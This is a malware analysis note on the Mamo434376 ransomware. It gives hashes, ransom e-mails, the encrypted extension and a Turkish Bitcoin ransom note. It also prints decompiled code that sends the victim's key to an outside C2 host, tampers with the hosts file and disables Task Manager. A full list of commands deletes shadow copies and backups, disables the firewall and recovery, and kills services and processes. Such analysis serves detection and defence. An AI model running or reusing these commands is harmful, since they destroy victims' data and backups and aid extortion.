## Mamo434376 ransomware

Might be related to other families:  
#MZREVENGE #KesLan #Deniz_Kızı  

## SHA256
- 24f5482541a024aa9655ee3a97481ec9ccdb660c037820159eb6992f2d0d72cb
- 2dd6ab3f09ce00e4aca8099a205fd0633c5e3bf68a4ba64b860f2635ace82596
- 2f61146c39b7838f741fcd769845191c9c3bf711fc72272125efbe4784c561b3
- 4f7b4920df5e49893b2561dae65abbe3f6413993fb1d4bb0b9da1c28fcae1726
- 83990eb15a86afd9de81534b3ed6d25cb0b5e26c16eb74d34b33106fb3b26bf3
- 8b615646e5707e5b59fe3151d5a00839db8c9fe5ac3d2cab4d95e94d16a40ba4
- c30ae67421647f8be7f8b61398ebdfc37c16a4be0760319980fcb1fc779fe4a8
- dc5355924d19880cb834c8ca3894cffb0dde8005523bd4003bbc5c8ffc421967
- f4a17ec97290cb0bb081308bbb94bb918a7b5d91a3b3ecc513a389b4f87e09e7

## VT perks:
- `resource:"d283a8a3b073709f55ea1fd65720b57c3ddc0d4e25210b42845e6c03632ceadb"` (ransom note)
- `C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb` (PDB)

## Encrypted extension
```
.TRSomware[is_back__New-Algorithm__By_MaMo434376]
```

### Ransom notefile
```
Beni Oku!!!.txt
```

## Ransom e-mails
```
yardimail1@aol.com
yardimail2@aol.com
```
Both e-mails use the same backup phone: `05** *** ** 97`  

## Seen PDBs
```
C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb
```

## C2
```
random = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
string text = Form1.RandomString(150);
string text2 = Form1.RandomString(12);
new WebClient().DownloadString("http://zaammmama.tk/SHwLFOP19dHNKMSJ2mXhN92ZcpOcAEz.php?vIrMpaVbm86WzXjtcxEsw4YQ1Syo0B9NvOSuTlKNTsD9ksoe3Y2QTKSWC9sr=ID:_" + text2 + "___Key:___" + text);
```

## Creates new host file (not hosts)
```
File.Delete("C:\\Windows\\System32\\drivers\\etc\\host");
Form1.createtextfilse("C:\\Windows\\System32\\drivers\\etc\\host", "127.0.0.1 validation.sls.microsoft.com");
```

## Disables Windows Task Manager
```
registryKey.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
registryKey.SetValue("DisableTaskMgr", "1");
```

## Executed OS commands
```
netsh firewall set opmode disable
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
```

## Services stoplist
```
net stop DbxSvc
net stop OracleXETNSListener
net stop OracleServiceXE
net stop AcrSch2Svc
net stop AcronisAgent
net stop Apache2.4
net stop SQLWriter
net stop MSSQL$SQLEXPRESS
net stop MSSQLServerADHelper100
net stop MongoDB
net stop SQLAgent$SQLEXPRESS
net stop SQLBrowser
net stop CobianBackup11
net stop cbVSCService11
net stop QBCFMontorService
net stop QBVSS
```

## Task killlist
```
taskkill /f /im sql.*
taskkill /f /im winword.*
taskkill /f /im wordpad.*
taskkill /f /im outlook.*
taskkill /f /im thunderbird.*
taskkill /f /im oracle.*
taskkill /f /im excel.*
taskkill /f /im onenote.*
taskkill /f /im virtualboxvm.*
taskkill /f /im node.*
taskkill /f /im QBW32.*
taskkill /f /im WBGX.*
taskkill /f /im Teams.*
taskkill /f /im Flow.*
```

## Extension list to encrypt:
```
".txt"
".doc"
".docx"
".rar"
".zip"
".xls"
".bin"
".xlsx"
".ppt"
".pptx"
".rtf"
".odt"
".jpg"
".png"
".csv"
".sql"
".mdb"
".sln"
".php"
".asp"
".aspx"
".html"
".xml"
".psd"
```

## Ransom note
```
Merhaba!

Sisteminizde önemli gördüğümüz datalarınızı şifreledik. Bilindik veri kurtarma yöntemleri ile verilerinizi geri getiremeyeceğinizi -
bilmenizi isteriz.
Bu yöntemler sadece sizin zaman kaybetmenize sebep olacaktır.
Yinede veri kurtarma firmaları yada programları kullanmak isterseniz lütfen asıl dosyalarınız üzerinde değil,
bunların kopyaları üzerinde işlem yapınız ve/veya yaptırınız.
Asıl dosyaların bozulması verilerinizin geri dönülmez şekilde zarar görmesine sebep olabilir.
Sifrelenen dosyalarınızın asılları, üzerinde rast gele veri yazma tekniğini kullanarak silinmiştir.

2 gün içerisinde dönüş yapılmadığı taktirde, sisteminizde kullanılan şifre silinecektir ve verileriniz asla geri döndürülmiyecektir.

Diskleriniz Full disk encryption ile şifrelenmiştir yetkisiz müdahale kalici veri kaybına neden olur!

Para verseniz daha açmazlar diyen bilgisayarcılara veya paranı alır dosyalarını vermez diyen -
etrafınızdaki insanlara inanmayın.
Size güven verecek kadar yeterli referansa sahibim.

Sizi tanımıyorum, dolaysıyla ile size karşı kötü duygular beslemenin size kötülük yapmanın bir anlamı"da yok,
amacım sadece bu işten bir gelir elde etmek.
Ödeme Bitcoin ile yapılmaktadır.
Bitcoin ne olduğunu buradan öğrenebilirsiniz : https://simple.wikipedia.org/wiki/Bitcoin
Yaptığınız ödeme sonrasında, en kısa zamanda verilerinizi eski haline döndürmek için size özel bir şifre çözücü yapacağım -
ve mail yoluyla size göndereceğim, ama tabi bunun için mail yoluyla bizimle iletişime geçmeniz ve bize ID"nizi göndermeniz gerekir.

Şifre çözme aracının fiyatı 300 dolar.
24 saat içerisinde dönüş yaparsanız size %50 indirim yapacağım.

Ödemeyi yapmak ve verilerinizin şifresini çözdürmek için aşağıdaki iletişim kanalından bizimle iletişime geçebilirsiniz.

Ulaşmak istediğinizde mutlaka aşağıda size özel üretilen ID"yi eklemeyi unutmayınız.

SITE_CODE:
ID: XXXXXXXXXX
E-Mail: yardimail1@aol.com
```
